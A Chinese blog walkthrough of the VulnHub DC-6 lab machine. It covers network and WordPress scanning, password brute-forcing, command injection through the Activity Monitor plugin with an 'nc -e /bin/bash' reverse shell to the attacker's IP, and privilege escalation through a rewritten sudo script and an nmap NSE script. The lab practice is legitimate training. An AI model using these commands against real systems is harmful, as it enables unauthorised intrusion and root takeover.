首页 > 其他好文 > 详细

DC-6靶机

时间：2020-05-07 19:20:21 阅读：172 评论：0 收藏：0 [点我收藏+]

标签：php 端口扫描 psc import nbsp 账号密码 images 服务 sha

仅供个人娱乐

靶机信息

下载地址：https://download.vulnhub.com/dc/DC-6.zip

一、主机发现

nmap -sn 192.168.216.0/24

技术图片

二、端口扫描

nmap -p 1-65535 -sV 192.168.216.132

技术图片

三、漏洞查找和利用

80端口

打开网页

技术图片

发现其中 web 服务被重定向到 http://wordy/ 修改host文件

echo "192.168.216.131 literally.vulnerable" >> /etc/hosts

技术图片

或者在C:\Windows\System32\drivers\etc下的HOSTS文件中增加192.168.216.132 wordy

技术图片

wpscan --urlhttp://wordy/ --enumerate 主题

wpscan --urlhttp://wordy/ --e u 用户

技术图片

技术图片

爆破出5个用户名admin,jens,graham,sarah,mark 将其作为字典爆破，直接用kali自带的/usr/share/wordlists/rockyou.txt ，我的字典复制到root目录下了

wpscan --url http://wordy/ -U 1.txt -P /root/rockyou.txt

技术图片

爆破出密码账号密码mark helpdesk01

技术图片

目录

技术图片

我们使用获得的密码登录http://wordy/wp-admin/

可以看到安装了activity_monitor插件

技术图片

searchsploit activity monitor

技术图片

技术图片

修改脚本

技术图片

开启一个简单的临时的web服务，去访问45274.html 来触发漏洞

python -m SimpleHTTPServer 8000

技术图片

启动网页

技术图片

多次测试修改，为了方便改为1.html

技术图片

python -c ‘import pty; pty.spawn("/bin/bash") #使用交互式命令行‘

技术图片

或者访问http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools输入ip，点击lookup，通过抓包修改ip参数的值为baidu.com | nc -e /bin/bash 192.168.216.128 4444

技术图片

反弹成功

技术图片

拿到shell开始信息收集

技术图片

技术图片

用户名和密码: graham GSo7isUM1D4，由于系统开启了ssh

技术图片

使用sudo -l 查看目前用户可以执行的操作，发现我们可以运行jens用户下面的backups.sh。查看其内容是对web进行打包备份的

技术图片

查看信息

技术图片

、

执行这个脚本的时候会以jens用户来执行，方法：sudo -u jens /home/jens/backups.sh

可以让jens执行/bin/bash就直接得到了jens的shell

首先需要删除

graham@dc-6:~$ cd /home/jens

graham@dc-6:/home/jens$ ls

backups.sh

graham@dc-6:/home/jens$ cat /dev/null > backups.sh

graham@dc-6:/home/jens$ cat backups.sh

graham@dc-6:/home/jens$ ls

backups.sh

graham@dc-6:/home/jens$ cat backups.s

graham@dc-6:/home/jens$ echo "/bin/bash" >>/home/jens/backups.sh

graham@dc-6:/home/jens$ cat /home/jens/backups.sh

/bin/bash

graham@dc-6:/home/jens$ sudo -u jens ./backups.sh

jens@dc-6:~$ whoami

jens

技术图片

已经是jens用户了，我们继续执行sudo -l 命令去查找我们可以进行的操作。

NOPASSWD: /usr/bin/nmap，jens用户可以在无需输入密码的情况下使用nmap，我们继续使用nmap去调用我们的脚本例如/bin/bash.

技术图片

nmap提权

nmap有执行脚本的功能，通过编写特殊脚本，可以实现利用nmap提权（sudo提权）

利用过程：写入一个执行bash的nmap脚本，运行

echo "os.execute(‘/bin/bash‘)" > /tmp/root.nse

sudo nmap --script=/tmp/root.nse

技术图片

标签：php 端口扫描 psc import nbsp 账号密码 images 服务 sha

原文地址：https://www.cnblogs.com/bingtang123/p/12838419.html

踩

(0)

赞

(0)

举报

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行

更多

友情链接

兰亭集智国之画百度统计站长统计阿里云 chrome插件新版天听网

关于我们 - 联系我们 - 留言反馈

© 2014 mamicode.com 版权所有联系我们:gaon5@hotmail.com

迷上了代码！